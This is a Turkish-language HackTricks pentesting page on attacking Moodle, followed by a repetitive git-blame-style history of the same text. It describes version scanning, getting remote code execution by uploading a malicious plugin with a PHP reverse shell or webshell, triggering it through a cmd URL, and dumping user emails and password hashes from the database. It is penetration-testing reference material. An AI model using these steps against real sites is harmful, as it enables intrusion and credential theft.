hacktricks/network-services-pentesting/pentesting-web/moodle.md

# Moodle

{% hint style="success" %}
AWS Hacking'i öğrenin ve pratik yapın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve pratik yapın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>HackTricks'i Destekleyin</summary>

* [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* **Bize katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya **bizi** **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
* **Hacking ipuçlarını paylaşın,** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR göndererek.

</details>
{% endhint %}
{% endhint %}

<figure><img src="../../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>

**Bug bounty ipucu**: **Intigriti'ye kaydolun**, **hackers tarafından, hackers için oluşturulmuş premium bir bug bounty platformu**! Bugün [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) adresine katılın ve **$100,000**'a kadar ödüller kazanmaya başlayın!

{% embed url="https://go.intigriti.com/hacktricks" %}

## Otomatik Taramalar

### droopescan
```bash
pip3 install droopescan
droopescan scan moodle -u http://moodle.example.com/<moodle_path>/

[+] Plugins found:
forum http://moodle.schooled.htb/moodle/mod/forum/
http://moodle.schooled.htb/moodle/mod/forum/upgrade.txt
http://moodle.schooled.htb/moodle/mod/forum/version.php

[+] No themes found.

[+] Possible version(s):
3.10.0-beta

[+] Possible interesting urls found:
Static readme file. - http://moodle.schooled.htb/moodle/README.txt
Admin panel - http://moodle.schooled.htb/moodle/login/

[+] Scan finished (0:00:05.643539 elapsed)
```
### moodlescan
```bash
#Install from https://github.com/inc0d3/moodlescan
python3 moodlescan.py -k -u http://moodle.example.com/<moodle_path>/

Version 0.7 - Dic/2020
.............................................................................................................

By Victor Herrera - supported by www.incode.cl

.............................................................................................................

Getting server information http://moodle.schooled.htb/moodle/ ...

server         	: Apache/2.4.46 (FreeBSD) PHP/7.4.15
x-powered-by   	: PHP/7.4.15
x-frame-options	: sameorigin
last-modified  	: Wed, 07 Apr 2021 21:33:41 GMT

Getting moodle version...

Version found via /admin/tool/lp/tests/behat/course_competencies.feature : Moodle v3.9.0-beta

Searching vulnerabilities...


Vulnerabilities found: 0

Scan completed.
```
### CMSMap
```bash
pip3 install git+https://github.com/dionach/CMSmap.git
cmsmap http://moodle.example.com/<moodle_path>
```
### CVEs

Moodle sürümünü etkileyen güvenlik açıklarını bulmak için otomatik araçların oldukça **işe yaramaz** olduğunu gördüm. Bunları [**https://snyk.io/vuln/composer:moodle%2Fmoodle**](https://snyk.io/vuln/composer:moodle%2Fmoodle) adresinde **kontrol** edebilirsiniz.

## **RCE**

**Yönetici** rolüne sahip olmanız gerekiyor ve **"Site yönetimi"** sekmesinde **eklenti yükleyebilirsiniz**\*\*:\*\*

![](<../../.gitbook/assets/image (630).png>)

Eğer yöneticiyseniz, bu **seçeneği etkinleştirmeniz** gerekebilir. Moodle ayrıcalık yükseltme PoC'de nasıl olduğunu görebilirsiniz: [https://github.com/HoangKien1020/CVE-2020-14321](https://github.com/HoangKien1020/CVE-2020-14321).

Sonra, klasik pentest-monkey php r**ev shell** içeren **aşağıdaki eklentiyi yükleyebilirsiniz** (_yüklemeden önce sıkıştırmayı açmanız, revshell'in IP ve portunu değiştirmeniz ve tekrar sıkıştırmanız gerekiyor_)

{% file src="../../.gitbook/assets/moodle-rce-plugin.zip" %}

Ya da "cmd" parametresi ile normal bir PHP shell almak için [https://github.com/HoangKien1020/Moodle\_RCE](https://github.com/HoangKien1020/Moodle\_RCE) adresindeki eklentiyi kullanabilirsiniz.

Kötü niyetli eklentiyi başlatmak için erişmeniz gereken yer:
```bash
http://domain.com/<moodle_path>/blocks/rce/lang/en/block_rce.php?cmd=id
```
## POST

### Veritabanı kimlik bilgilerini bulma
```bash
find / -name "config.php" 2>/dev/null | grep "moodle/config.php"
```
### Veritabanından Kimlik Bilgilerini Dökme
```bash
/usr/local/bin/mysql -u <username> --password=<password> -e "use moodle; select email,username,password from mdl_user; exit"
```
<figure><img src="../../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>

**Hata ödülü ipucu**: **Intigriti** için **kayıt olun**, **hackerlar tarafından, hackerlar için oluşturulmuş premium bir hata ödülü platformu**! Bugün [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) adresine katılın ve **$100,000**'a kadar ödüller kazanmaya başlayın!

{% embed url="https://go.intigriti.com/hacktricks" %}
{% hint style="success" %}
AWS Hacking'i öğrenin ve pratik yapın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve pratik yapın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>HackTricks'i Destekleyin</summary>

* [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter**'da **bizi takip edin** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Hacking ipuçlarını paylaşmak için** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin.

</details>
{% endhint %}
</details>
{% endhint %}
-												GitBook: [#3220] No subject

											
										
										
											2022-05-24 00:07:19 +00:00
+								# Moodle
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 11:44:24 +00:00
+								{% hint style="success" %}
 								AWS Hacking'i öğrenin ve pratik yapın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
 								GCP Hacking'i öğrenin ve pratik yapın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 11:44:24 +00:00
+								<details>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 11:44:24 +00:00
+								<summary>HackTricks'i Destekleyin</summary>
-												arte

											
										
										
											2023-12-31 01:24:39 +00:00
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 11:44:24 +00:00
+								* [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
 								* **Bize katılın** 💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) veya **bizi** **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** takip edin.**
 								* **Hacking ipuçlarını paylaşın,** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR göndererek.
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 11:44:24 +00:00
+								{% endhint %}
 								{% endhint %}
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:49:08 +00:00
+								<figure><img src="../../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>
-												GitBook: [#3220] No subject

											
										
										
											2022-05-24 00:07:19 +00:00
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 11:44:24 +00:00
+								**Bug bounty ipucu**: **Intigriti'ye kaydolun**, **hackers tarafından, hackers için oluşturulmuş premium bir bug bounty platformu**! Bugün [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) adresine katılın ve **$100,000**'a kadar ödüller kazanmaya başlayın!
-												GitBook: [#3220] No subject

											
										
										
											2022-05-24 00:07:19 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:49:08 +00:00
+								{% embed url="https://go.intigriti.com/hacktricks" %}
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								## Otomatik Taramalar
-												GitBook: [master] 2 pages modified
											
										
										
											2021-04-05 22:03:17 +00:00
-												GitBook: [#3220] No subject

											
										
										
											2022-05-24 00:07:19 +00:00
+								### droopescan
-												GitBook: [master] 2 pages and one asset modified
											
										
										
											2021-04-07 22:08:15 +00:00
+								```bash
 								pip3 install droopescan
 								droopescan scan moodle -u http://moodle.example.com/<moodle_path>/
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								[+] Plugins found:
 								forum http://moodle.schooled.htb/moodle/mod/forum/
 								http://moodle.schooled.htb/moodle/mod/forum/upgrade.txt
 								http://moodle.schooled.htb/moodle/mod/forum/version.php
-												GitBook: [master] 2 pages and one asset modified
											
										
										
											2021-04-07 22:08:15 +00:00
 								[+] No themes found.
 								[+] Possible version(s):
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+.10.0-beta
-												GitBook: [master] 2 pages and one asset modified
											
										
										
											2021-04-07 22:08:15 +00:00
 								[+] Possible interesting urls found:
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
+								Static readme file. - http://moodle.schooled.htb/moodle/README.txt
 								Admin panel - http://moodle.schooled.htb/moodle/login/
-												GitBook: [master] 2 pages and one asset modified
											
										
										
											2021-04-07 22:08:15 +00:00
 								[+] Scan finished (0:00:05.643539 elapsed)
 								```
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2

											
										
										
											2024-05-05 22:43:52 +00:00
+								### moodlescan
-												GitBook: [master] 2 pages and one asset modified
											
										
										
											2021-04-07 22:08:15 +00:00
+								```bash
 								#Install from https://github.com/inc0d3/moodlescan
 								python3 moodlescan.py -k -u http://moodle.example.com/<moodle_path>/
 								Version 0.7 - Dic/2020
 								.............................................................................................................
 								By Victor Herrera - supported by www.incode.cl
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
-												GitBook: [master] 2 pages and one asset modified
											
										
										
											2021-04-07 22:08:15 +00:00
+								.............................................................................................................
 								Getting server information http://moodle.schooled.htb/moodle/ ...
 								server         	: Apache/2.4.46 (FreeBSD) PHP/7.4.15
 								x-powered-by   	: PHP/7.4.15
 								x-frame-options	: sameorigin
 								last-modified  	: Wed, 07 Apr 2021 21:33:41 GMT
 								Getting moodle version...
 								Version found via /admin/tool/lp/tests/behat/course_competencies.feature : Moodle v3.9.0-beta
 								Searching vulnerabilities...
 								Vulnerabilities found: 0
 								Scan completed.
 								```
-												GitBook: [#3220] No subject

											
										
										
											2022-05-24 00:07:19 +00:00
+								### CMSMap
-												GitBook: [master] 2 pages and one asset modified
											
										
										
											2021-04-07 22:08:15 +00:00
+								```bash
-												cmsmap is not on pypi, so you can install it from github
											
										
										
											2022-10-27 15:22:10 +00:00
+								pip3 install git+https://github.com/dionach/CMSmap.git
-												GitBook: [master] 2 pages and one asset modified
											
										
										
											2021-04-07 22:08:15 +00:00
+								cmsmap http://moodle.example.com/<moodle_path>
 								```
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 11:44:24 +00:00
+								### CVEs
-												GitBook: [master] 2 pages and one asset modified
											
										
										
											2021-04-07 22:08:15 +00:00
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 11:44:24 +00:00
+								Moodle sürümünü etkileyen güvenlik açıklarını bulmak için otomatik araçların oldukça **işe yaramaz** olduğunu gördüm. Bunları [**https://snyk.io/vuln/composer:moodle%2Fmoodle**](https://snyk.io/vuln/composer:moodle%2Fmoodle) adresinde **kontrol** edebilirsiniz.
-												GitBook: [master] 2 pages and one asset modified
											
										
										
											2021-04-07 22:08:15 +00:00
-												GitBook: [#3220] No subject

											
										
										
											2022-05-24 00:07:19 +00:00
+								## **RCE**
-												GitBook: [master] 2 pages and one asset modified
											
										
										
											2021-04-07 22:08:15 +00:00
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 11:44:24 +00:00
+								**Yönetici** rolüne sahip olmanız gerekiyor ve **"Site yönetimi"** sekmesinde **eklenti yükleyebilirsiniz**\*\*:\*\*
-												GitBook: [master] 2 pages and one asset modified
											
										
										
											2021-04-07 22:08:15 +00:00
-												Translated ['README.md', 'binary-exploitation/arbitrary-write-2-exec/aw2

											
										
										
											2024-05-05 22:43:52 +00:00
+								![](<../../.gitbook/assets/image (630).png>)
-												GitBook: [master] 2 pages and one asset modified
											
										
										
											2021-04-07 22:08:15 +00:00
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 11:44:24 +00:00
+								Eğer yöneticiyseniz, bu **seçeneği etkinleştirmeniz** gerekebilir. Moodle ayrıcalık yükseltme PoC'de nasıl olduğunu görebilirsiniz: [https://github.com/HoangKien1020/CVE-2020-14321](https://github.com/HoangKien1020/CVE-2020-14321).
-												GitBook: [master] 2 pages and one asset modified
											
										
										
											2021-04-07 22:08:15 +00:00
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 11:44:24 +00:00
+								Sonra, klasik pentest-monkey php r**ev shell** içeren **aşağıdaki eklentiyi yükleyebilirsiniz** (_yüklemeden önce sıkıştırmayı açmanız, revshell'in IP ve portunu değiştirmeniz ve tekrar sıkıştırmanız gerekiyor_)
-												GitBook: [master] 2 pages and one asset modified
											
										
										
											2021-04-07 22:08:15 +00:00
 								{% file src="../../.gitbook/assets/moodle-rce-plugin.zip" %}
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 11:44:24 +00:00
+								Ya da "cmd" parametresi ile normal bir PHP shell almak için [https://github.com/HoangKien1020/Moodle\_RCE](https://github.com/HoangKien1020/Moodle\_RCE) adresindeki eklentiyi kullanabilirsiniz.
-												GitBook: [master] 2 pages and one asset modified
											
										
										
											2021-04-07 22:08:15 +00:00
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 11:44:24 +00:00
+								Kötü niyetli eklentiyi başlatmak için erişmeniz gereken yer:
-												GitBook: [master] 2 pages and one asset modified
											
										
										
											2021-04-07 22:08:15 +00:00
+								```bash
 								http://domain.com/<moodle_path>/blocks/rce/lang/en/block_rce.php?cmd=id
 								```
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:49:08 +00:00
+								## POST
-												Translated to Turkish

											
										
										
											2024-02-10 18:14:16 +00:00
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 11:44:24 +00:00
+								### Veritabanı kimlik bilgilerini bulma
-												GitBook: [master] 2 pages and one asset modified
											
										
										
											2021-04-07 22:08:15 +00:00
+								```bash
 								find / -name "config.php" 2>/dev/null | grep "moodle/config.php"
 								```
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 11:44:24 +00:00
+								### Veritabanından Kimlik Bilgilerini Dökme
-												GitBook: [master] 2 pages modified
											
										
										
											2021-04-05 22:03:17 +00:00
+								```bash
 								/usr/local/bin/mysql -u <username> --password=<password> -e "use moodle; select email,username,password from mdl_user; exit"
 								```
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:49:08 +00:00
+								<figure><img src="../../.gitbook/assets/i3.png" alt=""><figcaption></figcaption></figure>
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 11:44:24 +00:00
+								**Hata ödülü ipucu**: **Intigriti** için **kayıt olun**, **hackerlar tarafından, hackerlar için oluşturulmuş premium bir hata ödülü platformu**! Bugün [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) adresine katılın ve **$100,000**'a kadar ödüller kazanmaya başlayın!
-												GitBook: [#3220] No subject

											
										
										
											2022-05-24 00:07:19 +00:00
-												Translated ['forensics/basic-forensic-methodology/specific-software-file

											
										
										
											2024-02-18 14:49:08 +00:00
+								{% embed url="https://go.intigriti.com/hacktricks" %}
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 11:44:24 +00:00
+								{% hint style="success" %}
 								AWS Hacking'i öğrenin ve pratik yapın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
 								GCP Hacking'i öğrenin ve pratik yapın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								<details>
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 11:44:24 +00:00
+								<summary>HackTricks'i Destekleyin</summary>
-												arte

											
										
										
											2023-12-31 01:24:39 +00:00
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 11:44:24 +00:00
+								* [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
 								* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter**'da **bizi takip edin** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
 								* **Hacking ipuçlarını paylaşmak için** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin.
-												Ad hacktricks sponsoring

											
										
										
											2022-04-28 16:01:33 +00:00
 								</details>
-												Translated ['macos-hardening/macos-security-and-privilege-escalation/mac

											
										
										
											2024-07-19 11:44:24 +00:00
+								{% endhint %}
 								</details>
 								{% endhint %}